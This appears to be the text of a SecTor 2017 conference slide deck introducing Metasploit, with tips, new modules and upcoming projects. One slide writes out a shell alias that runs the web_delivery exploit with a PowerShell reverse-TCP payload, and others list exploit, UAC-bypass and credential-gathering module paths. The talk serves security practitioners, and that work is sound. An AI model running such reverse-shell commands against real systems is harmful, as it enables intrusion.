
Post on 16-Mar-2018

Metasploit Community: Tips, Tricks and What’s New

At SecTor 2017

Who am I?

Github: jmartin-r7
Twitter: @Op3n4M3

Jeffrey Martin

Senior Software Developer @ Rapid7

The Metasploit Community

The Agenda

● Intro to Metasploit
● What’s New in Metasploit
● Quick tips and hints
● What’s on the Horizon
● Questions?

The Basics

msfvenom
Meterpreter/Shell
Bind/Reverse

Msfconsole
Modules
Exploit/Post/Aux
Handler

Innovating with Metasploit

Modules

multi/http/struts2_rest_xstream
multi/http/struts2_content_type_ognl
exploits/linux/samba/is_known_pipename
exploits/windows/smb/ms17_010_eternalblue
post/windows/gather/credentials/dynazip_log

Named Pipes

Railgun

Packet Encryption

Aggregator

Alice’s Console

Bob’s Console

Shells

External Module

Console

JSON RPC

Proxy

SOCKS 5

MSF-RPC

Session

Project Cold Stone

vm-automation
metasploit-baseline-builder

metasploitable3

You use it, have you done this?

Getting up there quickly:
alias powershell='msfconsole -qx "use exploit/multi/script/web_delivery; set target 2; set payload windows/powershell_reverse_tcp; set LHOST eth0; exploit"'

When it works:
post/windows/gather/enum_patches
post/multi/recon/local_exploit_suggester

You use it, have you done this?

When it doesn’t quite do it:
msf> edit

You use it, have you done this?

When you want more:
exploits/windows/local/ms16_032_secondary_logon_handle_privesc
exploits/windows/local/bypassuac_fodhelper.rb
exploits/windows/local/capcom_sys_exec.rb
exploits/windows/local/razer_zwopenprocess.rb

Project Goliath

Database

Database

Metasploit Console

NMap, EyeWitness, etc

RubySMB (SMB 1+2)

Questions?

● IRC
Server - irc.freenode.net
Channel - #metasploit

● Blog
blog.rapid7.com/tag/metasploit

● Email
msfdev@metasploit.com

● Youtube
https://www.youtube.com/c/MetasploitR7

● New Metasploit.com
● COMING SOON

Slack
